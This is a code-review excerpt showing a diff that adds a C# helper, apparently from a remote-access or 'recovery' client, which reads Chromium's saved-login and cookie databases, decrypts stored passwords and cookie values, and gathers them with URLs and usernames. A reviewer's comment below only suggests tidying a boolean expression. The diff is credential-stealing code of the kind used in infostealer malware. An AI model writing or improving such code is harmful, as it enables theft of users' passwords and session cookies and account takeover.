Client/Core/Recovery/Helper/Chromium.cs

```diff
@@ -0,0 +1,174 @@
+                return data;
+
+            try
+            {
+                SQLDatabase = new SQLiteHandler(datapath);
+            }
+            catch (Exception)
+            {
+                return data;
+            }
+
+            if (!SQLDatabase.ReadTable("logins"))
+                return data;
+
+            string host;
+            string user;
+            string pass;
+            int totalEntries = SQLDatabase.GetRowCount();
+
+            for (int i = 0; i < totalEntries; i++)
+            {
+                try
+                {
+                    host = SQLDatabase.GetValue(i, "origin_url");
+                    user = SQLDatabase.GetValue(i, "username_value");
+                    pass = Decrypt(SQLDatabase.GetValue(i, "password_value"));
+
+                    if (!String.IsNullOrEmpty(host) && !String.IsNullOrEmpty(user) && pass != null)
+                    {
+                        data.Add(new LoginInfo
+                        {
+                            URL = host,
+                            Username = user,
+                            Password = pass,
+                            Browser = browser
+                        });
+                    }
+                }
+                catch (Exception)
+                {
+                    // TODO: Exception handling
+                }
+            }
+
+            return data;
+        }
+        public static List<ChromiumCookie> Cookies(string dataPath, string browser)
+        {
+            string datapath = dataPath;
+
+            List<ChromiumCookie> data = new List<ChromiumCookie>();
+            SQLiteHandler SQLDatabase = null;
+
+            if (!File.Exists(datapath))
+                return data;
+            try
+            {
+                SQLDatabase = new SQLiteHandler(datapath);
+            }
+            catch (Exception)
+            {
+                return data;
+            }
+
+            if (!SQLDatabase.ReadTable("cookies"))
+                return data;
+
+            string host;
+            string name;
+            string value;
+            string path;
+            string expires;
+            string lastaccess;
+            bool secure;
+            bool http;
+            bool expired;
+            bool persistent;
+            bool priority;
+
+            int totalEntries = SQLDatabase.GetRowCount();
+
+            for (int i = 0; i < totalEntries; i++)
+            {
+                try
+                {
+                    host = SQLDatabase.GetValue(i, "host_key");
+                    name = SQLDatabase.GetValue(i, "name");
+                    value = Decrypt(SQLDatabase.GetValue(i, "encrypted_value"));
+                    path = SQLDatabase.GetValue(i, "path");
+                    expires = SQLDatabase.GetValue(i, "expires_utc");
+                    lastaccess = SQLDatabase.GetValue(i, "last_access_utc");
+
+                    secure = SQLDatabase.GetValue(i, "secure") == "1" ? true : false;
```

Comment:
It could be something like <code>SQLDatabase.GetValue(i, "secure") == "1"</code> and the rest of it can be removed so the extra decision can be cut out.
Right now (though it is likely optimized out), it decides <code>if (true) { secure = true; } else { secure = false; }</code> :)